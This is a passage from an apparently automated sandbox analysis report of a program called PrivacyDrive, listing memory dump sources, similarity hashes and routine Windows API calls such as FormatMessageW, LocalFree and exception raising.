                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CaptureClassCriticalDeleteReleaseSectionUnregister
                                • String ID: cbfx_ToolTipWnd
                                • API String ID: 509205973-1218274383
                                • Opcode ID: e619c5eca145262e31b8a376ca729dd8f4ccbf9e88cd454fc6cae853a1958b74
                                • Instruction ID: 8c525298f3b4b57adc5f81e4ced5c874196da32faea43c23685c96fa3c3b8402
                                • Opcode Fuzzy Hash: e619c5eca145262e31b8a376ca729dd8f4ccbf9e88cd454fc6cae853a1958b74
                                • Instruction Fuzzy Hash: 4801D271904798ABD711CF58D80ABCEBBECFB09720F10425EE811A3380DBB86A04D795
                                APIs
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00402DC2,00000000,00000000,?,00000000), ref: 004A4020
                                • LocalFree.KERNEL32(00000000), ref: 004A404A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FormatFreeLocalMessage
                                • String ID: 0029
                                • API String ID: 1427518018-1198595668
                                • Opcode ID: 0328a4299f29ab1918295867bcf46d46f2e04cadb1dd41eb1905af3cac79d1f3
                                • Instruction ID: 8f35a0ec5d332d2d242128e332c30b03e661ac44e42e66c0bf61e782fd3eb577
                                • Opcode Fuzzy Hash: 0328a4299f29ab1918295867bcf46d46f2e04cadb1dd41eb1905af3cac79d1f3
                                • Instruction Fuzzy Hash: 59F06574790304BBFB30AA409C07FEF7A6CDB16B21F100155BA05B52D1D6F16E0096A9
                                APIs
                                • std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 00500A1E: std::exception::_Copy_str.LIBCMT ref: 00500A37
                                • __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                • String ID: bad function call
                                • API String ID: 757275642-3612616537
                                • Opcode ID: e939e1992166924e7d78a0d036c551b19b6c440b9e89c0a9390d6e3ac44e945d
                                • Instruction ID: fdb6d91c183fb84b14b932bbeab6bcb8cd92e312a47191a9679c71e4bc926273
                                • Opcode Fuzzy Hash: e939e1992166924e7d78a0d036c551b19b6c440b9e89c0a9390d6e3ac44e945d
                                • Instruction Fuzzy Hash: CCD0E278D0020DABCF00EEA5C89A8CDBFA8BA44304F908062BC10A7281E674E2488B90